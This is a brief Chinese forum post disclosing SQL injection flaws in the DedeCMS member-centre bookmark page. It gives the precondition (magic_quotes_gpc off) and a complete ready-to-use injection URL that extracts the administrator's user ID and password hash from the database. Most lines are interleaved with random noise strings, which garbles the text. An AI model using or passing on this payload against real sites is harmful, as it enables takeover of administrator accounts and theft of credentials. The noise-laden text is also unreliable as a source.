DedeCMS会员中心SQL注射漏洞& w8 p: O) n. A2 w
需要magic_quotes_gpc = Off* K; m5 F6 |4 w- Q. J5 P
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码./ f& k: l7 z( ^- a3 S: a! [
- v5 J7 N! d* @7 p& {DedeCMS会员中心书签管理SQL注射漏洞6 o5 k; ~# s' } c- t; E; O5 }
成功利用该漏洞可获得管理员密码0 X( D1 X" c7 K+ `
* N4 q9 \8 }6 d- J+ N2 ]会员登录后可以执行SQL语句查询数据库任意内容如管理员密码9 B0 O" C9 I4 U, b2 A9 k. Q
( c9 z& W$ v5 ^9 Y- Y
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
: ]5 T0 u2 C# d. A9 O$ [9 l |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59